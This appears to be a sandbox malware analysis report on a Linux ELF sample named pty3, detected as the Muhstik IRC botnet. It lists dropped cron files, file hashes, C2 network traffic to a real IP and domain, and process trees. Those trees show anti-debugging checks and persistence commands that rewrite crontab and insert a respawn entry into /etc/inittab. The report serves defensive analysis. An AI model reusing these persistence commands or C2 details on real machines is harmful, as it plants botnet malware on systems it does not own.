Preview:	.ELF..............>.............@...................@.8...@...................................................................P.......P.Q.....P.Q............................./l......l...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..D....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/run/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48964
Entropy (8bit):	7.872626881117998
Encrypted:	false
SSDEEP:	768:M02iLxh+reNihi1th2C8k+glPiDtQzUk5MZpbwMraJl7nyIsrJPudcNm9d/sjucW:M01Pe2XggtWtQQk5MZpB+l7nYrEdc89Z
MD5:	12CEDF7CD63208EE8FD9D0359637C46C
SHA1:	6C376C3A9D7811100E0C470FC3D4D05DE06FB30B
SHA-256:	4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720
SHA-512:	53C97FDFD5299B92CA91FA2D4F0899C3535C587AEAC3C49D05676270FED64C771369D65E74BB26E3519C3190A83FE3FFE3120B8FFD3F66CD3AAAED9F97B38F35
Malicious:	true
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@...................................................................P.......P.Q.....P.Q............................./l......l...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..D....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

/var/spool/cron/crontabs/tmp.OnJidY Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.044470124684252
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvoq/GMQ5UYLtCFt39YBtGF5qzK37hGFz:8QjHig8PeHLU9YfsqzKda
MD5:	DF95A2C7C3B0CD129B811ACB5B3F1AE2
SHA1:	6EC8911B9A2E3118E7C0266CD9C5773560847561
SHA-256:	6E0A8836D397C79499B91924D125E4A61ECCC754B3E8F8C5ADC54F2730F91FCB
SHA-512:	D10E25C7A26CF2734B5B013EFCD4F8064AF6A622D332ECDA32898E2D6112AD85769DF9A2EC2DD8C4CEEA7D1E7747760A658499596075A4F5654FC59D6B908E03
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 21 15:42:14 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.l3d2Df Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.08265322520662
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvoVMGMQ5UYLtCFt39YBtGFz:8QjHig81eHLU9Yfa
MD5:	EAE2C6FCF5EABDAA69293E977CFADD46
SHA1:	48380E921376A39BCA7394431D75C5D7784FAC4A
SHA-256:	466969C2F234EF9AE5D4D5211F538E3D9484FDDBF2F05D0F8492766CD786F7F3
SHA-512:	C9671A2ED8308A688264E8F1F6C80171CF2F6503547D50D19268C59C88D65CB7AA1F304024D853D10015846AF12A929706EA19AB92796B60F2A907A1557AEDC3
Malicious:	true
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 21 15:42:12 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.pRPXld Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	4.939921822102709
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvo6tGMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGF5f:8QjHig8BeHLU9YfsqzKdsq1bsq0Ya
MD5:	B763760C5B7244C7F8D5820EEA8FDFEF
SHA1:	486F8DA270FDD9F9CF632683A83BC3D096698852
SHA-256:	4115FFF1095E3A1A33E1AADDCAB3BA4237F61BD042C5387B6984C768F7D9C33B
SHA-512:	0D5C811C63CC1B309F8B6DCEEAF19E5134984E4501D9B5A58EE15791AD5B5FDCD1456338E72DE66483661614584D786B91B2D1D85724A5FEBF80E048E875FC76
Malicious:	true
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 21 15:42:16 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.qQwB9I Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	387
Entropy (8bit):	4.878171815272619
Encrypted:	false
SSDEEP:	12:8QjHig8MqeHLU9YfsqzKdsq1bsq0Ysqha:8+kALUqkqLqSqeq4
MD5:	47FB44CEA709598934EF70711333C669
SHA1:	2F7BFE9E83A60D695CCDC1C2696751C67FFAF0C3
SHA-256:	3DE200DD9B08562F2BE7B77BCF41378AA5FE0A950B10B08020080D6D30BE8A58
SHA-512:	36D4853540AE23D604E7F73FCB401AAC087300370A8222FDDD5978B7175BE9FA24783AA0FE7662C1E8115F8F4CABE2DB5556BC77FF97BC6EB2C6BC09E90C5928
Malicious:	true
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 21 15:42:18 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.* * * * * /var/run/pty3 > /dev/null 2>&1 &.

/var/spool/cron/crontabs/tmp.u6tmyy Download File
Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.979349083506767
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvoq/GMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGFz:8QjHig8PeHLU9YfsqzKdsq1ba
MD5:	6DE043946D868F92817F556D924A8D8A
SHA1:	32CDFB2C428F9837AE47E0E89EDF30EFAA8BDB83
SHA-256:	96902F1E136319C8025FF88BDE04A9B8CFC97E68C4EB113378220C5D5E6D00A8
SHA-512:	C9D320AE360E12A80F59224AC9902189062DB831CA1836683DF273E923A5117A23D46ED727E1A7940FBD08F2D2ED6D6270D9F48F5C37A1C7BC54816E5E57FCC2
Malicious:	true
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 21 15:42:14 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.

/var/tmp/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48964
Entropy (8bit):	7.872626881117998
Encrypted:	false
SSDEEP:	768:M02iLxh+reNihi1th2C8k+glPiDtQzUk5MZpbwMraJl7nyIsrJPudcNm9d/sjucW:M01Pe2XggtWtQQk5MZpB+l7nYrEdc89Z
MD5:	12CEDF7CD63208EE8FD9D0359637C46C
SHA1:	6C376C3A9D7811100E0C470FC3D4D05DE06FB30B
SHA-256:	4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720
SHA-512:	53C97FDFD5299B92CA91FA2D4F0899C3535C587AEAC3C49D05676270FED64C771369D65E74BB26E3519C3190A83FE3FFE3120B8FFD3F66CD3AAAED9F97B38F35
Malicious:	true
Preview:	.ELF..............>.............@...................@.8...@...................................................................P.......P.Q.....P.Q............................./l......l...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..D....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

Static File Info

General
File type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Entropy (8bit):	7.872626881117998
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	pty3
File size:	48964
MD5:	12cedf7cd63208ee8fd9d0359637c46c
SHA1:	6c376c3a9d7811100e0c470fc3d4d05de06fb30b
SHA256:	4a719439027a279b14a05d650691bed6e0a437ae87fb55895406616a55c6c720
SHA512:	53c97fdfd5299b92ca91fa2d4f0899c3535c587aeac3c49d05676270fed64c771369d65e74bb26e3519c3190a83fe3ffe3120b8ffd3f66cd3aaaed9f97b38f35
SSDEEP:	768:M02iLxh+reNihi1th2C8k+glPiDtQzUk5MZpbwMraJl7nyIsrJPudcNm9d/sjucW:M01Pe2XggtWtQQk5MZpB+l7nYrEdc89Z
File Content Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......l...................b.........!..ELF......>....@.m.m...H.#..v..8......+

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0x10b680
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	64
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x100000	0x100000	0xbde4	0xbde4	4.3838	0x5	R E	0x100000
LOAD	0x1ad50	0x51ad50	0x51ad50	0x0	0x0	0.0000	0x6	RW	0x100000

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/21/21-15:42:16.929658	TCP	2034743	ET TROJAN ELF/Muhstik Botnet CnC Activity	35994	8080	192.168.2.23	144.172.71.180

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2021 15:42:08.019571066 CET	42836	443	192.168.2.23	91.189.91.43
Dec 21, 2021 15:42:08.275553942 CET	42516	80	192.168.2.23	109.202.202.202
Dec 21, 2021 15:42:15.912678957 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:16.049130917 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:16.049240112 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:16.929657936 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.066152096 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.066185951 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.066231012 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.071268082 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.207802057 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.207875013 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.214865923 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.391129971 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.391232967 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:17.527667046 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.527698994 CET	8080	35994	144.172.71.180	192.168.2.23
Dec 21, 2021 15:42:17.527792931 CET	35994	8080	192.168.2.23	144.172.71.180
Dec 21, 2021 15:42:23.891464949 CET	43928	443	192.168.2.23	91.189.91.42
Dec 21, 2021 15:42:34.131242990 CET	42836	443	192.168.2.23	91.189.91.43
Dec 21, 2021 15:42:38.227170944 CET	42516	80	192.168.2.23	109.202.202.202
Dec 21, 2021 15:43:04.850769043 CET	43928	443	192.168.2.23	91.189.91.42

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2021 15:42:14.978840113 CET	34938	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.310522079 CET	53	34938	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.310771942 CET	34938	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.326884985 CET	53	34938	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.332324028 CET	57599	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.532357931 CET	53	57599	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.532561064 CET	57599	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.548819065 CET	53	57599	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.564263105 CET	43324	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.600769997 CET	53	43324	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.600950003 CET	43324	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.618341923 CET	53	43324	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.630446911 CET	55842	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.895953894 CET	53	55842	1.1.1.1	192.168.2.23
Dec 21, 2021 15:42:15.896136045 CET	55842	53	192.168.2.23	1.1.1.1
Dec 21, 2021 15:42:15.912287951 CET	53	55842	1.1.1.1	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 21, 2021 15:42:14.978840113 CET	192.168.2.23	1.1.1.1	0x3b86	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.310771942 CET	192.168.2.23	1.1.1.1	0x3b86	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.332324028 CET	192.168.2.23	1.1.1.1	0xec14	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.532561064 CET	192.168.2.23	1.1.1.1	0xec14	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.564263105 CET	192.168.2.23	1.1.1.1	0xbaad	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.600950003 CET	192.168.2.23	1.1.1.1	0xbaad	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.630446911 CET	192.168.2.23	1.1.1.1	0x3128	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.896136045 CET	192.168.2.23	1.1.1.1	0x3128	Standard query (0)	l.deutschland-zahlung.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 21, 2021 15:42:15.310522079 CET	1.1.1.1	192.168.2.23	0x3b86	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.326884985 CET	1.1.1.1	192.168.2.23	0x3b86	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.532357931 CET	1.1.1.1	192.168.2.23	0xec14	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.548819065 CET	1.1.1.1	192.168.2.23	0xec14	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.600769997 CET	1.1.1.1	192.168.2.23	0xbaad	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.618341923 CET	1.1.1.1	192.168.2.23	0xbaad	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.895953894 CET	1.1.1.1	192.168.2.23	0x3128	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)
Dec 21, 2021 15:42:15.912287951 CET	1.1.1.1	192.168.2.23	0x3128	Name error (3)	l.deutschland-zahlung.net	none	none	A (IP address)	IN (0x0001)

IRC Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 21, 2021 15:42:16.929657936 CET	35994	8080	192.168.2.23	144.172.71.180	NICK x86\|LOG\|i\|0\|6234378\|galassia USER x01 localhost localhost :muhstik-11052018
Dec 21, 2021 15:42:17.391232967 CET	35994	8080	192.168.2.23	144.172.71.180	JOIN #log :8974 WHO x86\|LOG\|i\|0\|6234378\|galassia

System Behavior

Analysis Process: pty3 PID: 5228 Parent PID: 5118

General

Start time:	15:42:06
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	/tmp/pty3
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5229 Parent PID: 5228

General

Start time:	15:42:06
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5229 Parent PID: 5228

General

Start time:	15:42:06
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x strace > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5230 Parent PID: 5229

General

Start time:	15:42:06
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5230 Parent PID: 5229

General

Start time:	15:42:06
Start date:	21/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x strace
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty3 PID: 5232 Parent PID: 5228

General

Start time:	15:42:09
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5232 Parent PID: 5228

General

Start time:	15:42:09
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "pidof -x tcpdump > /dev/null"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5233 Parent PID: 5232

General

Start time:	15:42:09
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pidof PID: 5233 Parent PID: 5232

General

Start time:	15:42:09
Start date:	21/12/2021
Path:	/usr/bin/pidof
Arguments:	pidof -x tcpdump
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

Chronological Activities

Analysis Process: pty3 PID: 5236 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5239 Parent PID: 5236

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5239 Parent PID: 5236

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -r"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5245 Parent PID: 5239

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5245 Parent PID: 5239

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -r
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5237 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5240 Parent PID: 5237

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5240 Parent PID: 5237

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5242 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5242 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5244 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5244 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep /tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5246 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5246 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5250 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5252 Parent PID: 5250

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5252 Parent PID: 5250

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5251 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5251 Parent PID: 5240

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5238 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5238 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/tmp/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5241 Parent PID: 5238

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5241 Parent PID: 5238

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5243 Parent PID: 5238

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5243 Parent PID: 5238

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5249 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5249 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5253 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5253 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
